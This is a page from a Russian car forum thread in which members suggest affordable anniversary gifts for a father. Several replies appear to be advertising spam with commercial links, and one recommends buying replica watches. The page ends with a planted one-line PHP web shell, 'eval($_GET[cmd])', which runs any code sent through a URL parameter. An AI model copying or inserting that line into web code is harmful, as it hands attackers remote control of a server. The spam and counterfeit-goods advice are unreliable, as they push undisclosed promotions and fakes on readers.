+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 19

Тема: Подарки родителям.


  1. #1
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71

    Подарки родителям.

    В этом году у отца юбилей, хочу его удивить подарком, только в голову ничего интересного не идет. За все эти года столько было подарено разных подарков, что уже не знаешь, и что дарить, да и с финансами немного туговато. А что вы дарите своим родителям, или родственникам, может, подкинете несколько недорогих идей.

  2. #2
    Мимо проходил Bastin is on a distinguished road Аватар для Bastin
    Регистрация
    24.01.2019
    Откуда
    Москва.
    Машина
    Бричка
    Сообщений
    47
    У нас с родителями давно оговорено, что подарки мы друг другу не покупаем, а просо дарим деньги. А там уже каждый для себя решает, что ему нужно, то и покупает. Кстати, очень удобно, всегда знаешь, что подарок полезный.))

  3. #3
    Мимо проходил Masewrol is on a distinguished road Аватар для Masewrol
    Регистрация
    28.01.2019
    Откуда
    Россия
    Машина
    Gof 6
    Сообщений
    64
    В принципе можно дарить и деньги, но на юбилей стоит подумать о подарке, ведь круглая дата. Неужели у вас нет никаких идей? Не обязательно покупать, что-то дорогое, сейчас вполне можно найти недорогой, и приличный подарок. А как вам такой вариант, что если сделать вашему отцу портрет на подарок, или фото на холсте, здесь, например, можно заказать, цена приемлемая https://muse.ooo/pechat/foto-na-kholste/ . Мне кажется, что такой подарок понравится любому.

  4. #4
    Мимо проходил Larik is on a distinguished road Аватар для Larik
    Регистрация
    04.01.2019
    Откуда
    Россия.
    Машина
    Golf 4
    Сообщений
    65
    Я бы на вашем месте поинтересовался, что нужно. Лучше дарить действительно полезные вещи. Мне в этом плане повезло, родители заранее всегда говорят, что им нужно, без всяких стеснений. А то я такой, что могу купить ненужную вещь, было и такое.)

  5. #5
    Мимо проходил Nevron is on a distinguished road Аватар для Nevron
    Регистрация
    26.01.2019
    Откуда
    Россия.
    Машина
    GOLF R
    Сообщений
    56
    С портретом, это отличная идея, я бы сам до такого не додумался бы, спасибо за подсказку, возьму и себе на заметку.) Но я бы к такому подарку добавил бы еще, что-нибудь, а то дарить один портрет на юбилей, как-то маловато будет. Можно купить еще, что-то необходимое, полезное. Например, галстук, или кожаный ремень, кстати, здесь есть неплохой выбор ремней, посмотрите, может, что подберете https://www.koshelek77.ru/Belts-for-man . Такие вещи, всегда, пригодятся, по себе знаю.

  6. #6
    Мимо проходил MarryMarry is on a distinguished road Аватар для MarryMarry
    Регистрация
    03.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    13
    Мой отец давно в свою комнату хотел повесить кондиционер, но не хватало денег на эту покупку, поэтому я со своей семьей решили его порадовать таким нужным подарком , на сайте выбрали подходящую модель и заказали ее с установкой. Папа был настолько рад, что вы себе и представить не можете, он получил в подарок то, что так давно хотел.

  7. #7
    Мимо проходил Zanetti is on a distinguished road Аватар для Zanetti
    Регистрация
    20.12.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    1
    Цитата Сообщение от Doper Посмотреть сообщение
    В этом году у отца юбилей, хочу его удивить подарком, только в голову ничего интересного не идет. За все эти года столько было подарено разных подарков, что уже не знаешь, и что дарить, да и с финансами немного туговато. А что вы дарите своим родителям, или родственникам, может, подкинете несколько недорогих идей.
    А подарите отцу хорошие и недорогие наручные часы, ведь в вашем случае это лучший вариант, поскольку за небольшие деньги можно купить очень хорошую реплику часов. Вот почитайте как заказать качественный подарок для отца - https://otvetnavse.com/modnye-aksess...vstvom-stilya/ и где можно купить его совсем недорого.

  8. #8
    Мимо проходил Zelen' is on a distinguished road Аватар для Zelen'
    Регистрация
    02.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    61
    я своим покупала тур на море.

  9. #9
    Мимо проходил Zelen' is on a distinguished road Аватар для Zelen'
    Регистрация
    02.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    61
    Цитата Сообщение от Larik Посмотреть сообщение
    Я бы на вашем месте поинтересовался, что нужно. Лучше дарить действительно полезные вещи. Мне в этом плане повезло, родители заранее всегда говорят, что им нужно, без всяких стеснений. А то я такой, что могу купить ненужную вещь, было и такое.)
    в смысле, поинтересовался? подставка для ручек!!!!

  10. #10
    Мимо проходил MarryMarry is on a distinguished road Аватар для MarryMarry
    Регистрация
    03.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    13
    Лучше дарить папе и маме по отдельности подарки, общие для двоих очень трудно подобрать. Мой отец получил в подарок набор отверток, а маме решила выбрать красивое украшение с жемчугом https://kherson.net.ua/news/izdelija...dom-ukrashenii, она его обожает, думаю в Злато именно сережки купить.

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Корпоративные подарки
    от tatarin в разделе Курилка
    Ответов: 6
    Последнее сообщение: 25.11.2020, 04:37
  2. Подарки на Новый Год
    от jordy в разделе Курилка
    Ответов: 3
    Последнее сообщение: 12.12.2018, 19:36
  3. Придумываем Подарки На Новый Год!
    от BarCas в разделе Разное
    Ответов: 3
    Последнее сообщение: 16.12.2008, 13:59
  4. Новогодние подарки от VW
    от Сайт в разделе Курилка
    Ответов: 0
    Последнее сообщение: 16.08.2007, 07:04

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}